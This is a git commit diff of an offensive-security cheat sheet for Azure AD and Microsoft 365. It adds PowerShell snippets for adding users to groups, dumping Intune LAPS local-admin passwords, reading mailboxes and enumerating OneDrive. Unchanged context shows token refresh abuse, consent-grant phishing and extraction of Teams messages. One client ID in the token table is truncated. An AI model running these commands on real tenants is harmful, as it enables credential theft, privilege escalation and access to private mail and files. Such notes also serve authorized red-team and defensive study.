Folder tree update
parent
1285fd980b
commit
24fe926630
|
@ -69,21 +69,21 @@ roadtx gettokens --refresh-token <refresh-token> -c 04b07795-8ddb-461a-bbee-02f9
|
||||||
```
|
```
|
||||||
|
|
||||||
```
|
```
|
||||||
scope resource client
|
scope resource client
|
||||||
.default 04b07795-8ddb-461a-bbee-02f9e1bf7b46 04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
.default 04b07795-8ddb-461a-bbee-02f9e1bf7b46 04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
1950a258-227b-4e31-a9cf-717495945fc2 1950a258-227b-4e31-a9cf-717495945fc2
|
1950a258-227b-4e31-a9cf-717495945fc2 1950a258-227b-4e31-a9cf-717495945fc2
|
||||||
https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
https://graph.windows.net 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://graph.windows.net 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
04b07795-8ddb-461a-bbee-02f9e1bf7b46
|
||||||
Files.Read.All d3590ed6-52b3-4102-aeff-aad2292ab01c d3590ed6-52b3-4102-aeff-aad2292ab01c
|
Files.Read.All d3590ed6-52b3-4102-aeff-aad2292ab01c d3590ed6-52b3-4102-aeff-aad2292ab01c
|
||||||
https://graph.microsoft.com d3590ed6-52b3-4102-aeff-aad2292ab01c
|
https://graph.microsoft.com 3590ed6-52b3-4102-aeff-aad2292ab01c
|
||||||
https://outlook.office.com 1fec8e78-bce4-4aaf-ab1b-5451cc387264
|
https://outlook.office.com 1fec8e78-bce4-4aaf-ab1b-5451cc387264
|
||||||
Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://outlook.office.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
https://outlook.office365.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
https://outlook.office365.com 00b41c95-dab0-4487-9791-b9d2c32c80f2
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -11,6 +11,15 @@
|
||||||
```ps1
|
```ps1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Add user to a group
|
||||||
|
```ps1
|
||||||
|
$groupid = "<group-id>"
|
||||||
|
$targetmember = "<user-id>"
|
||||||
|
$group = Get-MgGroup -GroupId $groupid
|
||||||
|
$members = Get-MgGroupMember -GroupId $groupid
|
||||||
|
New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Devices
|
## Devices
|
||||||
|
|
||||||
|
|
|
@ -22,10 +22,13 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Azure AD - Conditionnal Access
|
## Azure AD - Conditionnal Access Policy
|
||||||
|
|
||||||
Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
|
Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Azure AD - MFA
|
## Azure AD - MFA
|
||||||
|
|
||||||
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
|
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
|
||||||
|
|
|
@ -5,9 +5,10 @@
|
||||||
> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
|
> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
|
||||||
|
|
||||||
Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
|
Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
|
||||||
|
|
||||||
* **Disable user consent** : Users cannot grant permissions to applications.
|
* **Disable user consent** : Users cannot grant permissions to applications.
|
||||||
* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
|
* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
|
||||||
* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent,
|
* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent.
|
||||||
* **Custom app consent policy**
|
* **Custom app consent policy**
|
||||||
|
|
||||||
### Register Application
|
### Register Application
|
||||||
|
|
|
@ -22,9 +22,27 @@ Runbook must be SAVED and PUBLISHED before running it.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Microsoft Intune
|
||||||
|
|
||||||
|
* LAPS
|
||||||
|
```ps1
|
||||||
|
#requires -modules Microsoft.Graph.Authentication
|
||||||
|
#requires -modules Microsoft.Graph.Intune
|
||||||
|
#requires -modules LAPS
|
||||||
|
#requires -modules ImportExcel
|
||||||
|
|
||||||
|
$DaysBack = 30
|
||||||
|
Connect-MgGraph
|
||||||
|
Get-IntuneManagedDevice -Filter "Platform eq 'Windows'" |
|
||||||
|
Foreach-Object {Get-LapsAADPassword -DevicesIds $_.DisplayName} |
|
||||||
|
Where-Object {$_.PasswordExpirationTime -lt (Get-Date).AddDays(-$DaysBack)} |
|
||||||
|
Export-Excel -Path "c:\temp\lapsdata.xlsx" - ClearSheet -AutoSize -Show
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Office 365
|
## Office 365
|
||||||
|
|
||||||
### Extracting Microsoft Teams Messages
|
### Microsoft Teams Messages
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
|
TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
|
||||||
|
@ -32,15 +50,26 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Outlook
|
## Outlook Mails
|
||||||
|
|
||||||
* Read user messages
|
* Read user mails
|
||||||
```ps1
|
```ps1
|
||||||
Get-MgUserMessage -UserId <user-id> | ft
|
Get-MgUserMessage -UserId <user-id> | ft
|
||||||
Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
|
Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## OneDrive Files
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$userId = "<user-id>"
|
||||||
|
Import-Module Microsoft.Graph.Files
|
||||||
|
Get-MgUserDefaultDrive -UserId $userId
|
||||||
|
Get-MgUserDrive -UserId $UserId -Debug
|
||||||
|
Get-MgDrive -top 1
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
|
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
|
||||||
|
* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
|
|
@ -1,4 +1,4 @@
|
||||||
# Bug Hunting Methodology and Enumeration
|
# Bug Hunting Methodology
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
Loading…
Reference in New Issue